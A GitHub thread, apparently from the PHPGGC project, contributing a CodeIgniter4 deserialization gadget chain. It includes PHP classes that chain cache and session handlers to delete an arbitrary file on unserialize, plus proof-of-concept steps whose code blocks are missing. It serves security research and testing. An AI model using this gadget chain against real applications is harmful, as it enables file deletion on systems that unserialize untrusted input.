Closed therealcoiffeur closed 1 year ago
I haven't checked extensively but I believe there is a problem: the cache key should not contain "/", and as such the GC should handle this by splitting the input path and fill FileHandler::path and key.
For instance /file/to/delete.txt
should yield path: /file/to
and key: delete.txt
.
Thoughts ?
You're right, I therefore propose the following modification, which seems to work for me.
<?php
namespace CodeIgniter\Cache\Handlers {
class RedisHandler {
protected $redis;
public function __construct($remote_path) {
$this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler(
new \CodeIgniter\Cache\Handlers\FileHandler($remote_path),
$remote_path
);
}
}
class FileHandler {
protected $prefix;
protected $path = "";
public function __construct($remote_path) {
$this->prefix = dirname($remote_path) . "/";
}
}
}
namespace CodeIgniter\Session\Handlers {
class MemcachedHandler {
protected $memcached;
protected $lockKey;
public function __construct($memcached, $remote_path) {
$this->memcached = $memcached;
$this->lockKey = basename($remote_path);
}
}
}
Good to go ! Thanks coiffeur !
I would like to add my CodeIgniter4 gadget chain to PHPGGC.
Why?
Below is the responsible code.
File: system/Cache/Handlers/RedisHandler.php
File: system/Session/Handlers/MemcachedHandler.php
File: system/Cache/Handlers/FileHandler.php
And function
BaseHandler::validateKey()
is defined as:File: system/Cache/Handlers/BaseHandler.php
How?
Proof Of Concept
Then we generate the gadget chain using
PHPGGC
(we need to encode the string in base64 as it contains NULL bytes).Then we edit the file app/Controllers/Home.php so that it contains the following code:
File: app/Controllers/Home.php
Then the application can be launched as follows:
All we have to do now is make an HTTP GET request via
curl
to the URL http://localhost:8080 to trigger script execution.